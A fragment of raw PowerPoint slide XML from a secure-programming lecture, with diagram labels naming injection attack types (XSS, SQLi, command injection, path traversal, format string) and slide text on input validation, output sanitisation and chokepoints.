            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5058721" y="2901961"/>
            <a:ext cx="1128960" cy="414720"/>
            <a:chOff x="5647100" y="5592485"/>
            <a:chExt cx="1132783" cy="424708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Right Arrow 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5647100" y="5592485"/>
              <a:ext cx="1132783" cy="42470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56" name="Rechthoek 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5917291" y="5713409"/>
              <a:ext cx="157492" cy="17696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57" name="Rechthoek 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6144137" y="5713409"/>
              <a:ext cx="157491" cy="17696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18444" name="Rechthoek 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2952001" y="3649321"/>
            <a:ext cx="660960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6407"/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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1633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8445" name="Groep 71"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="19500000">
            <a:off x="4917601" y="1689481"/>
            <a:ext cx="1028160" cy="384480"/>
            <a:chOff x="5647100" y="5592485"/>
            <a:chExt cx="1132783" cy="424708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Right Arrow 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5647100" y="5592485"/>
              <a:ext cx="1132783" cy="42470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74" name="Rechthoek 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5916849" y="5711575"/>
              <a:ext cx="158653" cy="17656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75" name="Rechthoek 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6143524" y="5711476"/>
              <a:ext cx="158653" cy="17656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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18446" name="Groep 75"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="1440000">
            <a:off x="4932001" y="3535561"/>
            <a:ext cx="1026720" cy="384480"/>
            <a:chOff x="5647100" y="5592485"/>
            <a:chExt cx="1132783" cy="424708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Right Arrow 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5647100" y="5592485"/>
              <a:ext cx="1132783" cy="42470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78" name="Rechthoek 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5902711" y="5706857"/>
              <a:ext cx="157286" cy="17656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79" name="Rechthoek 78"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6142105" y="5713322"/>
              <a:ext cx="157286" cy="17656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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18447" name="Groep 79"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="20100000" flipH="1">
            <a:off x="2459521" y="3362761"/>
            <a:ext cx="940320" cy="374400"/>
            <a:chOff x="5647100" y="5592485"/>
            <a:chExt cx="1132783" cy="424708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Right Arrow 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5647100" y="5592485"/>
              <a:ext cx="1132783" cy="42470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82" name="Rechthoek 81"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5917786" y="5710967"/>
              <a:ext cx="157860" cy="1780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83" name="Rechthoek 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6142788" y="5713102"/>
              <a:ext cx="157862" cy="1780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18448" name="Rechthoek 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5379841" y="2402281"/>
            <a:ext cx="1241280" cy="5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6407"/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command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="446407"/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injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18449" name="Rechthoek 84"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4560482" y="1544041"/>
            <a:ext cx="787679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6407"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1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SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1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Afgeronde rechthoek 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6374881" y="2775241"/>
            <a:ext cx="1255680" cy="69984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633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>file </a:t>
            </a:r>
          </a:p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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
          </a:p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endParaRPr lang="en-GB" sz="1814" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18452" name="Groep 71"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="20520000">
            <a:off x="5112001" y="2156041"/>
            <a:ext cx="1009440" cy="423360"/>
            <a:chOff x="5647100" y="5592485"/>
            <a:chExt cx="1132783" cy="424708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Right Arrow 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5647100" y="5592485"/>
              <a:ext cx="1132783" cy="42470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6407">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Rechthoek 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5916061" y="5711082"/>
              <a:ext cx="158363" cy="17768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41" name="Rechthoek 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6142436" y="5710003"/>
              <a:ext cx="158363" cy="17768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18453" name="Rechthoek 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5513761" y="3162601"/>
            <a:ext cx="1092960" cy="5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6407"/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path traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18454" name="Rechthoek 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4029120" y="3750121"/>
            <a:ext cx="1584000" cy="5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6407"/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format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="446407"/>
            <a:r>
              <a:rPr lang="en-US" alt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string attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Afgeronde rechthoek 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6000481" y="3900067"/>
            <a:ext cx="1316160" cy="45792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633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>C library</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29434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err="1" smtClean="0"/>
              <a:t>Where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>how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validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sanitise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="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en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Typical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>combination</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US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altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> enters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>reject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>illegal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> input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altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escape output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when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it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exits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the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application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, eg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to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL database or OS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nl-NL" alt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nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input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sanitisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is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generally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a bad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idea</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" alt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nl-NL" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F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undamental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dilemma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with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forwarding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flaws</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="18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nl-NL" altLang="en-US" sz="1800" i="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" i="1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to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validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is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clearest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> at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the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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>point of entry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,                                          as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there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it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is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clear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what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> escape is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clearest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> at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the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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>point of exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,  as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there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you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know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how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data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will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be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean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nl-NL" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-NL" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2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94BF930-A873-43D6-ABAE-37DE0DBFE3FC}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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1429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chokepoints, again</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139270" name="Slide Number Placeholder 3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fld id="{0A859937-2688-43AB-AC2B-F4B800566CF8}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1400" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F07040305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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F07040305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95738" y="1557338"/>
            <a:ext cx="3882601" cy="9510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small interface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where </a:t>
            </a:r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input validation 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is done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close to where it enters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89928" y="4677141"/>
            <a:ext cx="3061736" cy="6647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additional </a:t>
            </a:r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chokepoints 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr 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output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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sanitisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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39269" name="Group 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="611560" y="1341438"/>
            <a:ext cx="2572965" cy="4214812"/>
            <a:chOff x="3000375" y="1357313"/>
            <a:chExt cx="2428875" cy="4214812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Trapezoid 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3429000" y="5357813"/>
              <a:ext cx="571500" cy="214312"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 54773"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF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rgbClr val="FFFF00"/>
                </a:solidFill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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Trapezoid 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3000375" y="2571750"/>
              <a:ext cx="2428875" cy="785813"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 137507"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Trapezoid 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3708400" y="1916113"/>
              <a:ext cx="1008063" cy="369887"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 78812"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF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rgbClr val="FFFF00"/>
                </a:solidFill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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139274" name="Rectangle 38"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3000375" y="3357563"/>
              <a:ext cx="2428875" cy="9144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9275" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4071938" y="2286000"/>
              <a:ext cx="285750" cy="285750"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="33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>
              <a:off x="3214688" y="1357313"/>
              <a:ext cx="2000250" cy="500062"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow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2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
                </a:rPr>
                <a:t>input</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Trapezoid 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3000375" y="4286250"/>
              <a:ext cx="1500188" cy="785813"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 76904"/>
              </a:avLst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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Trapezoid 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4357688" y="4286250"/>
              <a:ext cx="1071562" cy="785813"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 49921"/>
              </a:avLst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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139279" name="Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3571875" y="5072063"/>
              <a:ext cx="285750" cy="285750"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="33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9280" name="Rectangle 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4714875" y="5072063"/>
